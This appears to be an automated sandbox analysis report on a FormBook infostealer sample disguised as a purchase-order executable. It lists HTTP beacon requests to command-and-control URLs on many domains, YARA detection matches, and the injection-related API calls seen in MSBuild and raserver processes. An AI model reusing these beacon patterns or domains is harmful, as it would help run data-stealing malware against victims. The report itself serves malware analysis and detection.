Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.129.133

Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=Jn5Vr1+14bH3XXZofqraFeWVa26wP8rJvzlWs5bnBoBEHljdRY0tb4g4rLkzBbL1dWSS&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allan-wren.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=7TsZUea1gk4hSEvdc6EZbm1J0Wfs+lYlHRlJN5vF1TH1x8D6KkvV8DgWQzT8NLbVi8yc&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.theoutdoorbed.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJg4WZr1G+1s&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=cgoB+lenqGYlJtvc5JNC9VTF2CGbWvKagdSG/Om1O4x9+LG6GIhzUmnXZfPmgHDFLZxT&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.pasumaisangam.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEBypKVKLfK2k&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=xBkCUm8FF1kjoaFXSBT5hrl7iUeljBCg0asG3x/fx29GNVo3vuMsob2h52kMpeSzyrJ8&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.lotoencasa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=KYQlcl9vZGj8bR01lvQ9gDl5O0hjo7xV5yl6UTMOowrmblKr/7vG5jbVDjpERd28t5Sb&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.guidesgold.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=UOytMzsBKWezP+Z4jPobAURSNGb1svEAtMI07cL6UgNiZ1/Q1uLpHFW2AnXGybnNRzQX&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.thoughtslate.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.chemtradent.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=ZRPeOuYuFqwCE6hLODJInGZZul3mSlUAF2kmaH+TgtUwwh/GNGVQ9RWrqwSZOKD9NgnN&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.erpsystem.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=hqyhMfRLrOIQC7GjaQnjrCruer7JrdNhQeLxI9U0LsQdDm7qZoXdq0VVbkb5+tb+Xu86&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.forbigdogs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=42cTP78OQQp4lToQAaTApkvzdS7tu3b97V7Z9hUZNPZ7GHRvcEVBBFWfORKXu9ozCmYh&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.rockinglifefromhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=4PnhXD1XQOAEhvyRg6knEMy8erSWBtwfFfVfV7Yg7HuI1lqkNO9tokZPvE8hw33lw/Tr&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.allmm.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /igqu/?1b3H_Ni=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xt/OgRWZ9lL&JXhpvv=OXXTgtL8CzU0PRx0 HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: g.msn.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 21 Nov 2020 08:24:27 GMTServer: Apache/2.4.43 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.275549675.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: Purchase Order 40,7045$.exe, 00000000.00000002.259665211.0000000000F88000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.289490288.00000000011C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.521320039.0000000000660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.260425222.0000000003D51000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.521773301.0000000000950000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.289472822.0000000001190000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.289268123.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.521861519.0000000000980000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Purchase Order 40,7045$.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00417BA0 NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00417C50 NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00417CD0 NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00417D80 NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00417C4C NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00417CCA NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015299A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015298F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015295D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015297A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015296E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529950 NtQueueApcThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015299D0 NtCreateProcessEx,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0152B040 NtSuspendThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529820 NtEnumerateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015298A0 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529B00 NtSetValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0152A3B0 NtGetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529A10 NtQuerySection,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529A80 NtOpenDirectoryObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529560 NtWriteFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0152AD30 NtSetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529520 NtWaitForSingleObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015295F0 NtQueryInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529770 NtSetInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0152A770 NtOpenThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529760 NtOpenProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0152A710 NtOpenProcessToken,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529730 NtQueryVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529650 NtQueryValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529670 NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01529610 NtEnumerateValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015296D0 NtCreateKey,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048195D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048196D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048196E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048199A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048195F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0481AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819560 NtWriteFile,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048197A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0481A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819760 NtOpenProcess,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0481A770 NtOpenThread,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048198A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048198F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0481B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_048199D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819A10 NtQuerySection,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819A20 NtResumeThread,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_0481A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_04819B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00677BA0 NtCreateFile,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00677C50 NtReadFile,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00677CD0 NtClose,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00677D80 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00677C4C NtReadFile,
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 6_2_00677CCA NtClose,

Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_0130EB70
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_0130EB60
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe	Code function: 0_2_0130CB5C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041C16E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00408A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00408A3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041C52F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00402D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0041BF03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014EF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01504120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A1002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0150A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015BE824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B28EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014FB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015120A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B20A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0150AB40
